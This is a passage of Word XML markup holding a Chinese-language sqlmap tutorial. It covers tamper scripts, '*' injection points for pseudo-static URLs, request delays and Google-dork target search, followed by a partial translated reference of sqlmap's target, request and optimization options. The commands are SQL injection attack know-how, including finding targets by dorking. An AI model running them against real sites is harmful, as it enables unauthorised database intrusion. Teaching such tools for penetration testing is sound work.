      <w:r w:rsidRPr="00514A7F">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>tamper</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>插件使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –tamper “xxx.py”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url” –tamper=”xxx.py”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>关于</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>tamper</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>脚本详细说明在本博客中有，链接为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>http://www.matsec.cn/?id=5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="0047276E">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>将注入语句插入到指定位置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -u “url(www.xxx.com/id/1*.html)” –dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>有些网站是采用伪静态的页面使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>SQLMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>的普通注入是不行的，所以</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>SQLMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>提供了</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>”*”</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>参数将</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>语句插入指定位置，一般用于伪静态注入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>在使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入时使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>-r</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>参数也可以直接在文本中添加</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="001543DD">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>10.</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>延时注入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap –dbs -u “url” –delay 0.5 /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>延时</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>0.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>秒</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap –dbs -u “url” –safe-freq /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>次</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00776303">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>11.</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>使用谷歌语法搜索注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>(Google hack)</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>sqlmap.py -g “inurl:asp?id=1” /*””</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>内为搜索语法，如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>inurl,intitle,site,filetype</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>等等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="0073089F" w:rsidP="00514A7F">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#555" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（选项）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00A265CB">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–version </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>显示程序的版本号并退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00A265CB">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-h, –help </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>显示此帮助消息并退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00A265CB">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-v VERBOSE </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>详细级别：</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>0-6</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="0081143A">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Target</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（目标）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>以下至少需要设置其中一个选项，设置目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-d DIRECT </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>直接连接到数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-u URL, –url=URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-l LIST </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="006D575E">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Scarab</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>代理的日志中解析目标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-r REQUESTFILE </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>从一个文件中载入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-g GOOGLEDORK </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Google dork</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>的结果作为目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-c CONFIGFILE </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>INI</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>配置文件中加载选项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00CB55CF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（请求）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以用来指定如何连接到目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–data=DATA </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>发送的数据字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>–cookie=COOKIE HTTP Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–cookie-urlencode URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>编码生成的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–drop-set-cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>忽略响应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Set – Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>头信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–user-agent=AGENT </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve"> HTTP User – Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–random-agent </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>使用随机选定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP User – Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–referer=REFERER </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve"> HTTP Referer</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–headers=HEADERS </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>换行分开，加入其他的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–auth-type=ATYPE HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>身份验证类型（基本，摘要或</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>(Basic, Digest or NTLM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–auth-cred=ACRED HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>身份验证凭据（用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>密码）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–auth-cert=ACERT HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>认证证书（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>key_file</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>cert_file</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–proxy=PROXY </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>代理连接到目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–proxy-cred=PCRED HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>代理身份验证凭据（用户名：密码）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–ignore-proxy </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>忽略系统默认的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>代理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–delay=DELAY </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>在每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>请求之间的延迟时间，单位为秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–timeout=TIMEOUT </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>等待连接超时的时间（默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>秒）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–retries=RETRIES </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>连接超时后重新连接的时间（默认</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–scope=SCOPE </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>从所提供的代理日志中过滤器目标的正则表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–safe-url=SAFURL </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>在测试过程中经常访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–safe-freq=SAFREQ </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>两次访问之间测试请求，给出安全的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00B80390">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>Optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（优化）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可用于优化</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SqlMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的性能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-o </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>开启所有优化开关</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–predict-output </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>预测常见的查询输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–keep-alive </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>使用持久的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–null-connection </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>从没有实际的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>响应体中检索页面长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–threads=THREADS </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>最大的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）请求并发量（默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（注入）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以用来指定测试哪些参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>提供自定义的注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>和可选篡改脚本。</w:t>
      </w:r>
    </w:p>
